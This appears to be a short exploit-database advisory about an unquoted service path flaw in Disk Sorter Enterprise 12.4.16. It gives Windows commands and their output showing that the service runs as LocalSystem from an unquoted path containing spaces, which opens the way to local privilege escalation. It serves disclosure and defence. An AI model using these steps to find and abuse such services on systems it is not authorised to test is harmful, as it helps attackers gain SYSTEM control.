Share
Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksorter.com
Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe
Version: 12.4.16
Tested On: Windows 10 (32-bit)


C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """
Disk Sorter Enterprise          C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe              Auto

C:\Users\terran>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Sorter Enterprise
    TYPE        : 10 WIN32_OWN_PROCESS
    START_TYPE     : 2  AUTO_START
    ERROR_CONTROL   : 0  IGNORE
    BINARY_PATH_NAME  : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
    LOAD_ORDER_GROUP  :
    TAG        : 0
    DISPLAY_NAME    : Disk Sorter Enterprise
    DEPENDENCIES    :
    SERVICE_START_NAME : LocalSystem